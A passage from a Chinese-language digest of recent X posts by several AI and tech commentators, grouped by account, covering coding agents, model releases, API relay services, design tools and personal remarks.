他的结论是根据任务类型来回切换,而不是站队。 这跟我自己的体感基本一致。我现在日常编程也是双工具流: 1. 需要快速解决一个明确的技术问题、查 API 用法、debug 报错信息,GPT 响应快、知识面广,确实好用 2. 需要做一个比较复杂的重构、写一…\n[原文链接](https://x.com/Pluvio9yte/status/2050209273310060805)\n\n**[2026-05-01T12:25:12+00:00]**\n> 牛逼,今天刷到一篇帖子,然后成功用这个方法双开了微信👇 只需要将这段话发给Codex: 使用该项目 https://github.com/mcncarl/yichen-skills/tree/main/mac-wechat-dual-open 帮我安装微信双开。把它的图标换成蓝色。\n[原文链接](https://x.com/Pluvio9yte/status/2050189794324713656)\n\n**[2026-05-01T07:40:37+00:00]**\n> ⏺ OpenAI 官方发了一份 GPT-5.5 的 Prompt 编写指南,核心观点一句话概括:别再写又臭又长的 Prompt 了,告诉模型你要什么结果就行。 这份指南的思路挺有意思。以前大家写 Prompt 的习惯是\"手把手教\":先做A,再做B,然后比较C。 现在 OpenAI 官方的建议是:描述终点,而不是规定路线。 几个值得注意的点: 1. Outcome-First(结果导向): 不要写…\n[原文链接](https://x.com/Pluvio9yte/status/2050118179062743418)\n\n**[2026-05-01T04:39:44+00:00]**\n> ⏺ Sam Altman 这段话说得挺实在的:AI 的下一个大突破不是某个具体领域,而是人们意识到自己每天在电脑上浪费了多少时间。 简单说,大家以为 AI 的价值是\"帮你把某件事做得更好\",但 Altman认为真正的价值是\"帮你省掉那些根本不该做的事\"——在应用之间切换、复制粘贴、处理各种数字杂务。这些摩擦看着不起眼,但确实在不断打断心流。 这个观点我是认同的。说说自己的体验: 1. 以前写一篇…\n[原文链接](https://x.com/Pluvio9yte/status/2050072657618772226)\n\n**[2026-05-01T04:04:38+00:00]**\n> Anthropic这个BioMysteryBench直接把我对AI在硬核科学领域真实能力的认知彻底刷新了🤯 不是测评玩具benchmark,他们直接把Claude扔进99个来自真实研究的烂摊子生物信息学难题:原始DNA序列、临床样本那种messy到爆炸的数据,连PhD学生都要熬夜啃的开放谜题。 结果呢?5个领域专家都搞不定的23个硬骨头,Claude Mythos Preview直接干掉了约30…\n[原文链接](https://x.com/Pluvio9yte/status/2050063821377810451)\n\n**[2026-05-01T03:47:55+00:00]**\n> 卧槽,看完 Andrej Karpathy 在 Sequoia AI Ascent 2026 的最新访谈,我直接破防了🤯 他说:最近几个月,他作为程序员从来没有感觉这么“behind”过……不,是突然之间,他发现自己再也不落后了。12月前后,agentic tools 突然从“偶尔靠谱”变成了“离谱地靠谱”。 Karpathy说了三个阶段: Software 1.0:你写显式规则 Softwar…\n[原文链接](https://x.com/Pluvio9yte/status/2050059618043543563)\n\n**[2026-05-01T03:24:52+00:00]**\n> 这种平台有点意思,也见过好几个同类型的了。 互动加热的平台其实很大程度上依赖宣传和用户自传播。 见过两个逐渐杳无音讯的,目前唯一做起来的就是灯塔,看看这个平台会怎么样\n[原文链接](https://x.com/Pluvio9yte/status/2050053813802090671)\n\n**[2026-04-30T16:37:50+00:00]**\n> OpenAI 发了篇博客复盘自家模型一个挺有意思的\"口癖哥布林\"问题, 从 GPT-5.1 起,他们的模型莫名其妙开始爱用 goblin、gremlin 这些怪物词打比方,越往后越泛滥。 OpenAI 一路扒数据,定位到是训练 \"Nerdy\"(书呆子气)人格时,奖励信号意外地给\"用怪物词做比喻\"加了高分。 具体证据: 1. GPT-5.1 上线后,ChatGPT 里 goblin 用量涨了 17…\n[原文链接](https://x.com/Pluvio9yte/status/2049890985631768653)\n\n**[2026-04-30T16:18:34+00:00]**\n> A÷你认真的吗,38分钟打满了😅\n[原文链接](https://x.com/Pluvio9yte/status/2049886136580137378)\n\n**[2026-04-30T13:35:30+00:00]**\n> 补充一点我的经历:先拿到第一单,然后作为脱敏案例,后续拿下新客户也会更容易。\n[原文链接](https://x.com/Pluvio9yte/status/2049845097924342258)\n\n**[2026-04-30T13:01:33+00:00]**\n> 这篇文章说了很多小团队的协作经验 文里提到的一些模式我也深有体会。 曾经我也在工作之余兼职创业团队,也是toB,先打磨4个月,然后3个月赚了接近300万。 最后也是因为超预期在分钱上出了问题。 不过我没题主这么幸运,最后我一气之下离开了团队。如果在一开始就决定深入合作,找个律师过一眼合同还是挺重要的,这是我受到的教训。\n[原文链接](https://x.com/Pluvio9yte/status/2049836555171512759)\n\n**[2026-04-30T12:04:32+00:00]**\n> 这是我学习web3的一点点经验,目前刚接触不久,每一次学习和经验记录都会隔段时间记录下来,发一篇文章。 既是记录经验也是总结经验教训,欢迎各位一起围观下我的web3交易学习路径。\n[原文链接](https://x.com/Pluvio9yte/status/2049822206885286318)\n\n**[2026-04-30T12:00:57+00:00]**\n> x.com/i/article/204977806829…\n[原文链接](https://x.com/Pluvio9yte/status/2049821305072124254)\n\n**[2026-04-30T09:40:48+00:00]**\n> 欢迎大家来参加由http://dragoncode.codes举办的小黑客松 DragonCode是我和泊舟@bozhou_ai一起建立的Claude&Codex中转站,稳定运营了一段时间,也决定发起一些有意思的活动! 主题不难,围绕能够提效的小工具Vibe Coding即可 奖励: 🥇510元x1 🥈150元x2 🎁51 Dragon Code x15 参与方式见引用帖子:进群->填表>提交作品\n[原文链接](https://x.com/Pluvio9yte/status/2049786034502967620)\n\n**[2026-04-30T08:14:28+00:00]**\n> R to @Pluvio9yte: 帖子没了 可以去问grok GPT有什么促销活动\n[原文链接](https://x.com/Pluvio9yte/status/2049764309144879198)\n\n**[2026-04-30T06:49:00+00:00]**\n> 曾经国内数一数二日流水几十万的中转站88code 因拖欠巨额退款,已经秽土转生,正式换皮,改名为 Reclaude\n[原文链接](https://x.com/Pluvio9yte/status/2049742800049316039)\n\n---\n\n### ✅ @liuliu — 刘进(3 条)\n\n**[2026-05-01T17:33:05+00:00]**\n> What's harder for outsiders to understand is the falling of Deep Research inside @GeminiApp. On the other hand, Deep Research in @OpenAI is improving. Even so, nothing matches what Deep Research used…\n[原文链接](https://x.com/liuliu/status/2050267276893708414)\n\n**[2026-05-01T11:34:44+00:00]**\n> RT by @liuliu: 浏览器里跑 ASR 真的不是梦,一个完全没做啥优化的版本就能做到很高的准确率和推理速度了,估计我能优化到 0.04 这个速度(浏览器识别1秒音频需要 0.04秒时间)\n[原文链接](https://x.com/liuliu/status/2050177096505561140)\n\n**[2026-04-29T16:30:18+00:00]**\n> I think it is still unclear to me whether the gap between \"data in training set\" v.s. \"data in SKILL.md\" can be closed with further training on more SKILL.md, assuming latent reasoning will never mat…\n[原文链接](https://x.com/liuliu/status/2049526702334972397)\n\n---\n\n### ✅ @CuiMao — CuiMao(19 条)\n\n**[2026-05-01T18:31:06+00:00]**\n> 哈哈 @OpenAI 官号换掉了banner了 很明显,他们想再一次用这种画风重新走一遍当时4o宫崎骏现象级爆款。难,难啊。\n[原文链接](https://x.com/CuiMao/status/2050281878322811194)\n\n**[2026-05-01T16:08:50+00:00]**\n> 比我还抽象,刚才刷抖音,刷到个一个女的说,她自己用一个月的时间从什么都不懂的 AI 白痴,通过她的这套学习方法论,拿到了中厂的agent工程师 offer 😅😅😅😅,评论区一堆人求资料, 这个逼社会太疯狂了,我已经看不懂了。\n[原文链接](https://x.com/CuiMao/status/2050246075219693922)\n\n**[2026-05-01T15:54:12+00:00]**\n> I mainly focus on AI tech research and honestly, I’m not into crypto at all. Pls stop sending me DMs about collabs. Thanks🫡🫡🫡\n[原文链接](https://x.com/CuiMao/status/2050242393132396921)\n\n**[2026-05-01T09:31:03+00:00]**\n> RT by @CuiMao: I LOVE Deepseek-v4-flash, incredibly reliable and capable, logical. It's lacking in frontend but I have MiMo for that. I would recommend any company spending 100k+ a year on AI to purc…\n[原文链接](https://x.com/CuiMao/status/2050145968553709999)\n\n**[2026-05-01T09:15:45+00:00]**\n> 北京环球影城!✌️\n[原文链接](https://x.com/CuiMao/status/2050142119604691422)\n\n**[2026-04-30T14:47:31+00:00]**\n> R to @CuiMao: 本视频由seedance2生成,切勿当真!\n[原文链接](https://x.com/CuiMao/status/2049863222195572817)\n\n**[2026-04-30T12:45:32+00:00]**\n> 有没有深圳的,我准备搬到深圳住,有什么需要注意的和推荐的,求告知。\n[原文链接](https://x.com/CuiMao/status/2049832524067794961)\n\n**[2026-04-30T12:29:09+00:00]**\n> 老板,我们私底下做中转站的勾当彻底被曝光了 @DarioAmodei\n[原文链接](https://x.com/CuiMao/status/2049828401201246395)\n\n**[2026-04-30T09:09:57+00:00]**\n> 你这个朋友我认识\n[原文链接](https://x.com/CuiMao/status/2049778271714496808)\n\n**[2026-04-29T16:57:53+00:00]**\n> 全局md里面我之前只设置了CuiMao,没设定我的中文,所以老是乱翻译。下次干活先让他去市面上打听打听我的信息,然后再回来给我干活。事半功倍。\n[原文链接](https://x.com/CuiMao/status/2049533641563484523)\n\n**[2026-04-29T16:42:47+00:00]**\n> R to @CuiMao: github.com/Cuimao777/cuimao-…\n[原文链接](https://x.com/CuiMao/status/2049529840349614318)\n\n**[2026-04-29T16:42:24+00:00]**\n> RT by @CuiMao: Deepseek v4挺好的,接入claude code花了5.65块,把英语原版的30万字汉化成了EPUB,结果还有模有样的,借鉴了宝玉 @dotey 的Skill做了节省token的优化处理方案。评论区拿skill\n[原文链接](https://x.com/CuiMao/status/2049529746279796864)\n\n**[2026-04-29T13:28:23+00:00]**\n> 加了一些 AI 大 V 的微信才发现,原来,朋友圈都是孩子的日常,都是当爹的人了,孩子老大了。\n[原文链接](https://x.com/CuiMao/status/2049480920001114551)\n\n**[2026-04-29T07:55:14+00:00]**\n> Deepseek好像要发多模态的了,好好睁开眼睛看看这个世界吧!\n[原文链接](https://x.com/CuiMao/status/2049397079177592925)\n\n**[2026-04-29T07:44:33+00:00]**\n> x.com/i/article/204921670329…\n[原文链接](https://x.com/CuiMao/status/2049394392776290573)\n\n**[2026-04-29T06:04:54+00:00]**\n> 呵呵,上个月我说雷总的模型会把价格打下来,一群人喷我懂个 p 的 AI ,今天满屏都是感谢雷总,天地良心,成年人的世界真的他妈的太现实了吧。\n[原文链接](https://x.com/CuiMao/status/2049369313547800804)\n\n**[2026-04-28T18:44:13+00:00]**\n> 干爹发新模型了! 属于Nemotron 3 系列中的多模态版本。可以文本、图像、视频、音频的统一理解与推理,专为Agentic AI设计,特别适合给多模态感知子代理用,我来试试给Hermes用用看,\n[原文链接](https://x.com/CuiMao/status/2049198015232315465)\n\n**[2026-04-28T14:06:08+00:00]**\n> 50000🎉🎉\n[原文链接](https://x.com/CuiMao/status/2049128032661852434)\n\n**[2026-04-28T14:03:04+00:00]**\n> 如果你的claude里面要接deepseek v4 pro,effort一定要拉到max才有效果。官方文档里说的。也挺好,反正这几天四舍五入等于不要钱。\n[原文链接](https://x.com/CuiMao/status/2049127261409034535)\n\n---\n\n### ✅ @0xAA_Science — 0xAA(18 条)\n\n**[2026-05-01T18:31:03+00:00]**\n> 一直想要个越野摩托车,这次张雪出了 MX250,支持一下。\n[原文链接](https://x.com/0xAA_Science/status/2050281865245024365)\n\n**[2026-05-01T16:01:35+00:00]**\n> 我发现 Cursor 额度还挺耐用的,使劲蹬才用掉了 $150,这 $10,000 得用到什么时候? 看起来只有跑类似 auto research 的循环任务才能消耗掉这些 token 了!\n[原文链接](https://x.com/0xAA_Science/status/2050244250563182801)\n\n**[2026-05-01T15:59:10+00:00]**\n> 目前 WTF AI 讨论群已经 700 多人了,如果你的申请没有通过,可以推特私信我你的 TG 昵称。\n[原文链接](https://x.com/0xAA_Science/status/2050243640925233619)\n\n**[2026-05-01T08:23:56+00:00]**\n> 贵州牛肉粉 3u\n[原文链接](https://x.com/0xAA_Science/status/2050129079677145442)\n\n**[2026-04-30T12:47:23+00:00]**\n> 孜然牛肉盖饭 4u\n[原文链接](https://x.com/0xAA_Science/status/2049832988452778343)\n\n**[2026-04-30T04:08:52+00:00]**\n> 昨天 ETH 出了个rug项目 MOGG,开盘最高30M,很快跌到 200k。 最近行情本来就不好,就出了一个火箭狗跑到 200M,剩下都是小打小闹。 大家保护好本金,等待BSC行情回暖吧。\n[原文链接](https://x.com/0xAA_Science/status/2049702500622889410)\n\n**[2026-04-29T16:27:23+00:00]**\n> 君子生非异也,善假于 AI 也。 — A子\n[原文链接](https://x.com/0xAA_Science/status/2049525966628958553)\n\n**[2026-04-29T12:16:05+00:00]**\n> 已经有朋友联系我能提供0.5折的 Claude 反向代理API,还有朋友免费注册了几万个 ChatGPT plus 账号,长见识了。 建了个 WTF AI 电报群,欢迎加入,申请时记得自我介绍下: https://t.me/+ZCnxv1CA0u5jMmU1\n[原文链接](https://x.com/0xAA_Science/status/2049462724216987766)\n\n**[2026-04-28T10:24:33+00:00]**\n> 央视报道了 “渔猎齐哥” Up主,真牛逼啊。 监督环境保护,吾辈义不容辞!\n[原文链接](https://x.com/0xAA_Science/status/2049072268165497033)\n\n**[2026-04-28T05:40:29+00:00]**\n> 青椒肉丝饭 + 老盐百香果 6u\n[原文链接](https://x.com/0xAA_Science/status/2049000780519321906)\n\n**[2026-04-28T03:52:33+00:00]**\n> 快连被墙干服了,关停了中国大陆的服务。 我没用过快联,不过这几天群里都是说快连用不了的,感觉用户很多。 有什么好的 vpn 推荐吗?我其实觉得买个海外服务器,让 AI 帮你自建一个 VPN 更靠谱。\n[原文链接](https://x.com/0xAA_Science/status/2048973617854328890)\n\n**[2026-04-27T08:47:12+00:00]**\n> Meta 对 Manus 的收购被中国发改委驳回。 看来以后要么一开始就出海,要么就不出海。\n[原文链接](https://x.com/0xAA_Science/status/2048685380304871774)\n\n**[2026-04-27T07:30:32+00:00]**\n> RT by @0xAA_Science: 用 @gmgnai 的 skill (获取链上数据) + @xapi_to xapi skill(社交搜索)组合玩玩,做了个异动的meme(异动的老币+新币+多链异动同名币+持续上升币),担心再次错过太空狗等信号~ 有 ai 真方便啊~\n[原文链接](https://x.com/0xAA_Science/status/2048666088733581805)\n\n**[2026-04-27T03:49:07+00:00]**\n> 狗B们在组团在 bags 分流太空狗,好恶心啊。 下次它们买什么,咱们就去找个新盘子分,好吗?\n[原文链接](https://x.com/0xAA_Science/status/2048610365324623966)\n\n**[2026-04-26T07:01:25+00:00]**\n> 给 auth2api 加了对 openai/codex 账号的授权支持,等审核完成就会合并。 另外最近 xAPI 也在探索 AI 中转业务,有中转站和号商资源的可以联系我,我建个AI中转交流群,方便大家沟通。 https://github.com/AmazingAng/auth2api\n[原文链接](https://x.com/0xAA_Science/status/2048296373569941533)\n\n**[2026-04-26T04:15:19+00:00]**\n> 感觉 gpt 5.5 的 plan 能力比 opus 4.7 要强。 opus 总是吭哧吭哧搞个很复杂的方案,gpt 给的plan 更简单并能达到同样效果。\n[原文链接](https://x.com/0xAA_Science/status/2048254571622113742)\n\n**[2026-04-26T02:36:56+00:00]**\n> 川普的命真是硬啊,在白宫记者晚宴遭遇枪击,结果又平安无事! 枪手 Cole Allen,来自加州,曾经被评为月度最佳教师。\n[原文链接](https://x.com/0xAA_Science/status/2048229814172275062)\n\n**[2026-04-25T04:05:21+00:00]**\n> 卧槽,收到 Cursor 送的 10,000u AI 额度! 昨天 @edwinarbus 联系我送额度的时候,我还以为是骗子。不过挂着 cursor 的标,而且只是要个邮箱,我抱着试一试的态度回复了,没想道还真送了! 这个月要多 vibe coding 些狗屎了! @VibeShit_Org @cursor_ai\n[原文链接](https://x.com/0xAA_Science/status/2047889676867080420)\n\n---\n\n### ✅ @dingyi — Ding(20 条)\n\n**[2026-05-01T13:04:04+00:00]**\n> Stop making coding agents... https://www.dpcode.cc/\n[原文链接](https://x.com/dingyi/status/2050199576603468134)\n\n**[2026-05-01T08:57:02+00:00]**\n> 这个音频组件库做得太完美了。 https://audio.raphaelsalaja.com/\n[原文链接](https://x.com/dingyi/status/2050137408268886450)\n\n**[2026-05-01T07:05:58+00:00]**\n> 新时代的设计灵感聚合站,应该长这样。把网站的设计样式都变成了 design.md https://styles.refero.design/\n[原文链接](https://x.com/dingyi/status/2050109458957947150)\n\n**[2026-05-01T04:13:08+00:00]**\n> 假新闻、任何虚假的东西,总是能获得更多关注。这对吗?\n[原文链接](https://x.com/dingyi/status/2050065962855182350)\n\n**[2026-05-01T02:11:02+00:00]**\n> 老奶奶 vibe 大法果然好用。\n[原文链接](https://x.com/dingyi/status/2050035236487172404)\n\n**[2026-04-30T15:37:12+00:00]**\n> The future of product design.\n[原文链接](https://x.com/dingyi/status/2049875727689146789)\n\n**[2026-04-30T09:46:26+00:00]**\n> 最近刷推,像是逛街,中转站一条街。。。全是自卖自夸吆喝的。(无恶意就是描述一种景象\n[原文链接](https://x.com/dingyi/status/2049787450290287014)\n\n**[2026-04-30T05:57:17+00:00]**\n> Pinned: 尼玛被拉了几个所谓的榜单,发现我的人设被人们定义为产品推广专家了。。。 其实我们主要帮企业做网站,以前服务过不少 Web3 公司,但现在那个行业已死,业务很少了。如果有 AI 或独立开发者需要设计方面的服务,可以来私聊。 https://vibeflow.co/\n[原文链接](https://x.com/dingyi/status/2049729786726302168)\n\n**[2026-04-30T04:49:20+00:00]**\n> 厉害啊,喜欢什么就去做什么👍\n[原文链接](https://x.com/dingyi/status/2049712686238445579)\n\n**[2026-04-30T02:36:24+00:00]**\n> 现在任何网站,其实 AI 只能做到颜色、布局、字体的复刻,Google 的 design.md 也只能做到这一步。原版里面那些精妙的动画,很多细节的东西,AI 永远都做不了。这才是设计师的价值。\n[原文链接](https://x.com/dingyi/status/2049679228908793921)\n\n**[2026-04-30T00:32:54+00:00]**\n> 2026年了,如果一个“人”突然积极回复你的每一条内容,只有一种可能:他用 AI 自动回复的。点进他主页一看,同一时间,同时回复了十几个人。 上一次有人这么积极回复,还是因为爱情。。。\n[原文链接](https://x.com/dingyi/status/2049648150605123629)\n\n**[2026-04-29T15:13:45+00:00]**\n> Ling-2.6-flash is now open-source! A 104B MoE (7.4B active) built for agents. Ling-2.6-1T will follow today. Hugging Face: https://huggingface.co/inclusionAI/Ling-2.6-flash ModelScope: https://models…\n[原文链接](https://x.com/dingyi/status/2049507438156787936)\n\n**[2026-04-29T09:38:53+00:00]**\n> 这个动效设计 skills 真好! npx skills add jakubantalik/transitions-dev\n[原文链接](https://x.com/dingyi/status/2049423162933395583)\n\n**[2026-04-29T03:49:14+00:00]**\n> 我就知道🤣🤣🤣\n[原文链接](https://x.com/dingyi/status/2049335171066061234)\n\n**[2026-04-29T01:47:21+00:00]**\n> Ghostty 离开 GitHub,同一天 Warp 宣布开源。 Warp 一直以来都很好用,但越来越臃肿,性能也差点意思,但对不会命令行的非程序员非常友好,这次开源可以说是一个重大转折点,没准半年后各种 Warp 变体都会出现了。 还有,Warp 现在的垂直 tab 就比基于 Ghostty 的那些 Cmux 好用多了,期待未来出现更多好用的终端!\n[原文链接](https://x.com/dingyi/status/2049304499093946475)\n\n**[2026-04-28T22:59:18+00:00]**\n> 我去有人知道这是哪位大神设计的吗?@FateTell 应该是今年看到的设计最精美又好玩的 iOS app 了 !算命 + AI 结合很有创意,细节打磨的也相当好。哪怕你对八字之前不感兴趣,我也建议下载一个把玩一下。看多了千篇一律 vibe 的产品,突然看到这个真的让人眼前一亮啊。 https://fatetell.com/zh-CN/invite?referral=QQE5QT\n[原文链接](https://x.com/dingyi/status/2049262208241332358)\n\n**[2026-04-28T16:58:50+00:00]**\n> So good!\n[原文链接](https://x.com/dingyi/status/2049171494329065493)\n\n**[2026-04-28T16:40:15+00:00]**\n> 最喜欢的硅谷科技公司之一 Poolside 发布模型了!他们的网站设计简直是艺术品。 https://poolside.ai/\n[原文链接](https://x.com/dingyi/status/2049166818452160778)\n\n**[2026-04-28T15:07:51+00:00]**\n> 周末刚说完 Cursor 很聪明,小米马上就学会了。免费给一个月会员,也没几个钱,不管谁申请都秒过,相当于请所有网友免费宣传,万一还有不少人忘了关掉自动续费,反而还赚了🤣 我感觉以后所有模型厂商都学会这招了,再也没有他们的商单了。。。\n[原文链接](https://x.com/dingyi/status/2049143565260042558)\n\n**[2026-04-28T11:59:03+00:00]**\n> 之前买过 ZenMux 速度还是挺快的, 算是 OpenRouter alternative 吧。咱也不是很懂,感觉既然能上 OpenCode 的第三方列表,说明还是比较正规和靠谱的吧? 目前 DeepSeek V4 限时免费体验:https://zenmux.ai/invite/RUR17S\n[原文链接](https://x.com/dingyi/status/2049096050158551248)\n\n---\n\n### ✅ @GoSailGlobal — Jason Zhu(20 条)\n\n**[2026-05-01T15:43:21+00:00]**\n> R to @GoSailGlobal: 提示词: Rework the given image into a crayon-style illustration, transforming the entire scene into something that feels hand-drawn by a 10-year-old. Keep the forms simple and slight…\n[原文链接](https://x.com/GoSailGlobal/status/2050239662288146865)\n\n**[2026-05-01T15:43:21+00:00]**\n> 海外疯玩的prompt 可以用来给自己的profile,生成一个十岁小孩的蜡笔画 提示词放下面👇(截图+pormpt就行):\n[原文链接](https://x.com/GoSailGlobal/status/2050239659377295552)\n\n**[2026-05-01T15:30:01+00:00]**\n> 发现海外的人真牛逼,AI真的可以做游戏啦❗️❗️ 这是 AI 做整套游戏角色目前唯一能跑通的工作流 99% 的人卡在 walk cycle(走路循环动画,左右腿交替的连续动作)上,是因为他们一直试图用 GPT Image 2.0(OpenAI 最新的图像生成模型)/ Nano Banana 2(Google Gemini 的图像生成模型代号)解决 无论怎么 prompt(给 AI 的文字指令)、…\n[原文链接](https://x.com/GoSailGlobal/status/2050236307721584945)\n\n**[2026-05-01T12:48:53+00:00]**\n> 英文圈 freelancer 每月从客户那拿 $5K-$25K 做的事 Anthropic 官方在一个 30 分钟的视频里全讲完了 中文圈知道的人不到 1%,传开就没差价了 他们做的就一件事 把 Claude Code SDK + GitHub Action 接到客户自己的代码仓库里,做成一套自动化的工程流水线 为什么客户愿意为这个付钱? 不是 AI 写代码这件事值钱,是「把 AI 放进生产环境…\n[原文链接](https://x.com/GoSailGlobal/status/2050195755936448705)\n\n**[2026-05-01T12:33:04+00:00]**\n> 大部分人的 RAG 系统,只检索一次就完事了——这可能是你效果上不去的最大原因。 via @omarsar0 这条帖子讲的是「推理过程中什么时候该去检索」,AI 开发者建议收藏。 核心观点拆解: 1️⃣ 多数 RAG 系统的做法是:用户提问 → 检索一次 → 丢给模型生成答案。一锤子买卖,检索质量不够,后面全白搭。 2️⃣ 更好的思路是在推理过程中动态触发检索——模型推到一半发现信息不够,再去拿…\n[原文链接](https://x.com/GoSailGlobal/status/2050191775881736409)\n\n**[2026-05-01T12:21:44+00:00]**\n> 孙割是真割啊 我是懒得去试 积分额度随便调,背后调度可想而知😅\n[原文链接](https://x.com/GoSailGlobal/status/2050188921665941984)\n\n**[2026-05-01T10:05:55+00:00]**\n> GPT 5.5 可以通过设定目标和指标 自行迭代优化🔁\n[原文链接](https://x.com/GoSailGlobal/status/2050154742480040440)\n\n**[2026-05-01T07:53:41+00:00]**\n> Spotify真的挺有意思的 为人类艺术家打上了“验证”标签 是不是太多AI生成了。 看来AI Generate的标识已经打不过来,甚至分辨不出来了\n[原文链接](https://x.com/GoSailGlobal/status/2050121466021363878)\n\n**[2026-05-01T07:49:04+00:00]**\n> OpenAI 要分家了 山姆(Sam)醉酒发推 GitHub 要完蛋了 Anthropic 还是老样子 播客也挺难的,支持一下\n[原文链接](https://x.com/GoSailGlobal/status/2050120304203317373)\n\n**[2026-05-01T05:58:11+00:00]**\n> 硅谷101 这期 DeepSeek,我反复看了 3 遍 陈茜也转发了我的推文 3 个细节没人注意到,但对我们做出海/独立开发的影响最大: 1️⃣ DeepSeek 全员 ~150 人,正面打 OpenAI 1000+ 出海产品从来不是\"等团队够大\",是\"敢做\" 我 1 个人 3 个月上了 4 个出海工具,靠的就是 Cursor + DeepSeek API + 不内耗 2️⃣ 幻方 7 年量化背…\n[原文链接](https://x.com/GoSailGlobal/status/2050092401004564952)\n\n**[2026-05-01T04:54:26+00:00]**\n> x.com/i/article/204974561199…\n[原文链接](https://x.com/GoSailGlobal/status/2050076357296824737)\n\n**[2026-05-01T04:51:28+00:00]**\n> 今天看了 @GabiExplores 的两个项目: stitch-kit · 22 ★ · Google Stitch MCP 完整设计 pipeline,35 skill / 5 层架构,覆盖 6 个 agent 平台 slopbuster · 2 ★ · AI 文本去痕迹,含市面上唯一的 code 去 AI 味(comment / commit / naming),引用 4 篇 LLM 检测…\n[原文链接](https://x.com/GoSailGlobal/status/2050075607707586658)\n\n**[2026-05-01T03:08:51+00:00]**\n> 🤔赚钱 -> 美股,长持复利 2月开始关注上英特尔的,后面又加仓 陈立武真是英特尔的福星\n[原文链接](https://x.com/GoSailGlobal/status/2050049784094855501)\n\n**[2026-04-30T16:25:11+00:00]**\n> 👀回顾来时路 从这条推文开始,进行了9个月的日更推文 经历了内容方向的摸索、带人X增长与知识付费和自身X增长矛盾的时期、B端业务探索 算是找到了点出路 离职的可以参考下,在职的也要掂量下\n[原文链接](https://x.com/GoSailGlobal/status/2049887802863583240)\n\n**[2026-04-30T16:02:00+00:00]**\n> Naval 讲了一句让我转身就去打开 Cursor 的话 电子游戏给你的是假奖励真多巴胺 vibe coding 给你的是真奖励真多巴胺 游戏让你卡在能力边缘,但世界是别人造的,迟早通关 vibe coding 底下跑的是图灵机,无界,目标自己定,做出来的东西是真的 他一批朋友因此\"消失了\",钻进去做自己想了很多年的那个 app 他自己也在一个人重做 Airchat 而最难的不是写代码,是知道你…\n[原文链接](https://x.com/GoSailGlobal/status/2049881966850499058)\n\n**[2026-04-30T15:58:18+00:00]**\n> Mitchell(Vagrant、Terraform、Ghosty 的作者)今天宣布离开 GitHub GitHub 第 1299 号用户,注册 18 年,几乎没断过一天 他说写完离别帖,眼泪滴到了键盘上 不是矫情,是 GitHub 真的快不能用了 最近两周连续翻车 1️⃣ 4 月 23 日 merge queue 出 bug,2800 多个 PR 被静默撤回,已经合进主干的代码凭空消失 2️⃣…\n[原文链接](https://x.com/GoSailGlobal/status/2049881037547999546)\n\n**[2026-04-30T15:25:23+00:00]**\n> ChatGPT 还在让你复制粘贴的时候,Gemini 已经把活儿干完了 昨天 Google 悄悄上线了一个功能:在对话框里直接生成文件,你让他帮你写一份 budget,它是真的给你导出 Excel 支持的格式一口气拉满: PDF / Word / Excel Google Docs / Sheets / Slides LaTeX / CSV / TXT / RTF / Markdown 操作只有…\n[原文链接](https://x.com/GoSailGlobal/status/2049872749850665004)\n\n**[2026-04-30T14:44:27+00:00]**\n> x.com/i/article/204974126036…\n[原文链接](https://x.com/GoSailGlobal/status/2049862449474740224)\n\n**[2026-04-30T13:24:32+00:00]**\n> RT by @GoSailGlobal: x.com/i/article/204984109084…\n[原文链接](https://x.com/GoSailGlobal/status/2049842340056174762)\n\n**[2026-04-29T17:43:48+00:00]**\n> RT by @GoSailGlobal: Starting today, agents can now be Cloudflare customers. They can create a Cloudflare account, start a paid subscription, register a domain, and get back an API token to deploy co…\n[原文链接](https://x.com/GoSailGlobal/status/2049545195914498139)\n\n---\n\n### ✅ @frxiaobei — 凡人小北(16 条)\n\n**[2026-05-01T07:35:11+00:00]**\n> 这几周 Codex 常驻电脑,已经很久没有打开 ChatGPT 了。 推荐一下插件和自动化,很上头。\n[原文链接](https://x.com/frxiaobei/status/2050116811769954778)\n\n**[2026-04-29T22:32:26+00:00]**\n> RT by @frxiaobei: x.com/i/article/204961669954…\n[原文链接](https://x.com/frxiaobei/status/2049617833370202182)\n\n**[2026-04-29T15:48:47+00:00]**\n> 刚好今天下午跟团队开会,聊到了 Symphony。 过去这段时间团队手搓了一套系统,想解决一个很现实的问题: 别再让产品和技术被各自的工具链锁住了。 现阶段虽然 AI Coding 大家虽然玩的很溜,但认知上还未对齐,还在遵守老的规范,产品做需求,做完需求评审,评审完以后技术守着 codex、claude code 或者 cursor 这种本地工具,开发协作还是靠人肉对齐,整个过程其实很割裂,效…\n[原文链接](https://x.com/frxiaobei/status/2049516252281135554)\n\n**[2026-04-29T14:43:40+00:00]**\n> RT by @frxiaobei: We’re introducing the Cursor SDK so you can build agents with the same runtime, harness, and models that power Cursor. Run agents from CI/CD pipelines, create automations for end-to…\n[原文链接](https://x.com/frxiaobei/status/2049499866217185492)\n\n**[2026-04-28T16:56:00+00:00]**\n> 我现在基本不太直接用 Agent了。 介绍下我的AI 搭档,Finn。 现在大部分情况是 Finn 让 Agent 去干活。 工作流其实挺简单的: 我现在会现在 Codex (之前是 Claude Code) 里把一个 Agent 或者 skill 调好,跑到稳定。 然后直接丢给 OpenClaw,后面基本就不太管了 这一步挺关键的。 不然你会发现一个很烦的事情: 你要跟一堆 Agent 来回对…\n[原文链接](https://x.com/frxiaobei/status/2049170782170042513)\n\n**[2026-04-28T16:07:28+00:00]**\n> 现在远程面试可以更干脆了。 面试官当甲方出需求, 应聘者打开 Codex / Claude Code, 直接共享屏幕开始干。 半小时什么都看清了。\n[原文链接](https://x.com/frxiaobei/status/2049158565487935850)\n\n**[2026-04-28T15:53:41+00:00]**\n> 雷老板是懂营销的, 本着拿人 token,替人带货的原则, 替 Xiaomi MiMo 喊个话。\n[原文链接](https://x.com/frxiaobei/status/2049155099071750164)\n\n**[2026-04-28T13:41:13+00:00]**\n> 图像类产品现在分两派: 把单次生成做到极致,和把整个视觉工作流跑通。 flowith 明显是后者,还顺手把视频给 seedance 出来了。 关键是底层就是 image2,而且不止这一个模型。 不管底层怎么换,上层工作流都很稳。 单点极致 + 工作流闭环,两派合一。 对我这种普通用户非常有价值。\n[原文链接](https://x.com/frxiaobei/status/2049121762009632774)\n\n**[2026-04-28T05:05:35+00:00]**\n> Claude Code 最近放飞得厉害,“Let 我”是哪国语言,是被 chinglish 污染了吧。\n[原文链接](https://x.com/frxiaobei/status/2048991998275965022)\n\n**[2026-04-27T16:45:39+00:00]**\n> RT by @frxiaobei: A completely local agent that lives right inside your browser. Powered by Gemma 4 E2B and WebGPU, it uses native tool calling to: 🔍 Search browsing history 📄 Read and summarize 